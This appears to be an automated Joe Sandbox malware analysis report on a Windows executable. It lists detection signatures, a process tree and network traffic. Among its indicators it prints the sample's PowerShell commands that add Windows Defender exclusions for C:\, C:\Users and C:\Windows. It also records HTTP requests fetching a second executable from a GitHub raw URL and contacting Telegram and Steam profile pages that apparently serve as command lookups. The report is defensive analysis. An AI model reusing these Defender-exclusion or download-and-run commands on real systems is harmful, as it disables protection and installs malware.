Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name:YYjRtxS70h.exe
renamed because original name is a hash value
Original sample name:5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID:1579768
MD5:5a59ce92b07de68c0be8fbd7944214e2
SHA1:b0536d674552c3a11a881b154b668af1b5222641
SHA256:e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags:exeuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • YYjRtxS70h.exe (PID: 4044 cmdline: "C:\Users\user\Desktop\YYjRtxS70h.exe" MD5: 5A59CE92B07DE68C0BE8FBD7944214E2)
    • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2616 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 3576 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 5608 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 4044, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'", ProcessId: 2616, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T08:51:37.056484+010020287653Unknown Traffic192.168.2.84972137.27.43.98443TCP
2024-12-23T08:52:55.063421+010020287653Unknown Traffic192.168.2.84971237.27.43.98443TCP
2024-12-23T08:53:31.487765+010020287653Unknown Traffic192.168.2.84971637.27.43.98443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: YYjRtxS70h.exeVirustotal: Detection: 62%Perma Link
Source: YYjRtxS70h.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
Machine Learning detection for dropped file
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: YYjRtxS70h.exeJoe Sandbox ML: detected
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA,14_2_0041FC3B
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: YYjRtxS70h.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00420370 FindFirstFileA,FindFirstFileA,14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042498B FindFirstFileA,FindFirstFileA,14_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02832309
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 37.27.43.98:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 37.27.43.98:443
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00418024 InternetReadFile,14_2_00418024
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;) equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;a( equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: t.me
Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.1561429732.0000000007723000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coU
